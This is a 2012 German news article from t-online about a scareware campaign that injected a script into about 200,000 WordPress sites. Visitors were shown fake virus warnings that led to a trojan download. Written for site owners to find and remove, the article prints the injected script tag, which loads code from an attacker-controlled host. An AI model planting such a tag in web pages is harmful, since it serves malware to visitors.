Sie sind hier: Home > Digital > Internet & Sicherheit > Sicherheit >

Hacker verseuchen 200.000 Internetseiten

Hacker infizieren 200.000 Internetseiten

08.03.2012, 13:35 Uhr | t-online.de

Hacker verseuchen 200.000 Internetseiten. Hacker vergiften WordPress-Blogs mit Scarewarefallen. (Quelle: imago images)

Hacker vergiften WordPress-Blogs mit Scarewarefallen. (Quelle: imago images)

Online-Kriminelle missbrauchen 200.000 Internetseiten für die Verbreitung von Schadsoftware. Durch einen Trick vergiften die Hacker die Programmierung der Seiten mit einem kurzen Befehlscode, mit dessen Hilfe sie einen Trojaner auf den Computern ihrer Opfer installieren wollen.

Betroffen sind Seiten, die mit der kostenlosen Blogsoftware WordPress betrieben werden. Das meldet das IT-Sicherheitsunternehmen Websense. Die Online-Kriminellen nutzen ein Sicherheitsleck aus, dass vor allem in älteren Versionen von WordPress vorhanden ist. Durch diese Hintertür schleusen die Angreifer einen nur vier Zeilen langen Programmcode ein, der die Seite dann sozusagen infiziert, ohne das der Betreiber es merkt. Insgesamt sollen derzeit 200.000 WordPress-Seiten betroffen sein, so Websense.

Scareware-Falle auf WordPress

Diese Warnmeldung lockt Besucher infizierter Internetseiten in die Falle. (Quelle: Websense)Diese Warnmeldung lockt Besucher infizierter Internetseiten in die Falle. (Quelle: Websense) Sobald der Code eingeschleust ist, erscheint auf dem Bildschirm der Besucher der Internetseite eine Warnmeldung. Sie vermittelt dem Besucher den Eindruck, dass sein Computer mit vielen gefährlichen Viren verseucht sei. Die Warnmeldung enthält einen Link auf eine weitere Seite. Die erscheint dem Nutzer in ihrer Darstellung wie ein Fenster des Windows Explorers, inklusive einer angeblichen Microsoft-Sicherheitswarnung. Auch hier wird dem Besucher noch einmal eine massive Infektion seines Computers mit PC-Viren vorgegaukelt. Abhilfe könne nur eine bestimmte Software schaffen, zu der die Kriminellen auch gleich einen Download-Link anbieten. Dahinter verbirgt sich jedoch kein seriöses Anti-Viren-Programm, sondern ein Trojaner.

Dieser Trojaner ist glücklicherweise schon etwas älter. Alle gängigen Anti-Virenprogramme sollten ihn erkennen und eliminieren können. Nutzer sollten deshalb ihre Schutzsoftware immer auf dem neuesten Stand halten. Die Kriminellen könnten jedoch die verbreitete Schad-Software jederzeit austauschen. Es wäre problemlos möglich, über diese Methode einen ausgefeilteren Trojaner oder Links auf weitere manipulierte Internetseiten zu verbreiten.

Bisher vor allem US-Seiten betroffen

Rund 85 Prozent der betroffenen Internetseiten sind in den USA angesiedelt. Die Online-Kriminellen scheinen es also vorerst nicht auf Europa und Deutschland abgesehen zu haben. Das aber kann sich jederzeit ändern. Betreiber von WordPress-Blogs können Ihre Installation überprüfen, indem sich nach dem Code-Schnipsel <script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script> suchen und dieses entfernen. Zudem sollte immer auf die neueste Version von WordPress aktualisiert werden, um Sicherheitslecks der Vorgängerversionen zu schließen. Derzeit ist Version WordPress 3.3.1. der aktuellste Stand.

Leserbrief schreiben

Für Kritik oder Anregungen füllen Sie bitte die nachfolgenden Felder aus. Damit wir antworten können, geben Sie bitte Ihre E-Mail-Adresse an. Vielen Dank für Ihre Mitteilung.

Name
E-Mail
Betreff
Nachricht
Artikel versenden

Empfänger

Absender

Name
Name
E-Mail
E-Mail

Media Markttchibo.deOTTOWeltbildbonprix.deLIDLBabistadouglas.deMadeleine
Mehr zum Thema
Sie sind hier: Home > Digital > Internet & Sicherheit > Sicherheit

shopping-portal

Hinweis:

Der Internet Explorer wird nicht länger von t-online unterstützt!

Um sicherer und schneller zu surfen, wechseln Sie jetzt auf einen aktuellen Browser.

Wir empfehlen unseren kostenlosen t-online-Browser: